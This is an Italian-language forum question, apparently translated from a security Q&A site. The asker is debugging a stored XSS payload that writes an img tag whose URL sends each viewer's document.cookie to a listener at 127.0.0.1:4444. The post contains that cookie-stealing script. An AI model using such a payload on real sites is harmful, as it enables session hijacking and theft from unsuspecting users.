Problema di sintassi dello script XSS

0

Ho un server in esecuzione sulla porta 4444 su localhost che fa solo eco ai messaggi che riceve.

Ho uno script JS incorporato in un messaggio che dovrebbe inviare i cookie a chiunque lo guardi.

Ecco lo script:

     <script>document.write("<img src=http://127.0.0.1:4444?c=" 
+ escape(document.cookie) + " >"); </script>

Tuttavia, questo non invia le informazioni sui cookie al server. Nulla viene echeggiato o stampato sul lato server. So che il server è in esecuzione normalmente perché l'esecuzione di telnet localhost 4444 e la digitazione di un messaggio riecheggiano il messaggio.

C'è qualcosa di sbagliato nel mio script?

    
posta vira 12.10.2015 - 05:07
fonte

0 risposte

Leggi altre domande sui tag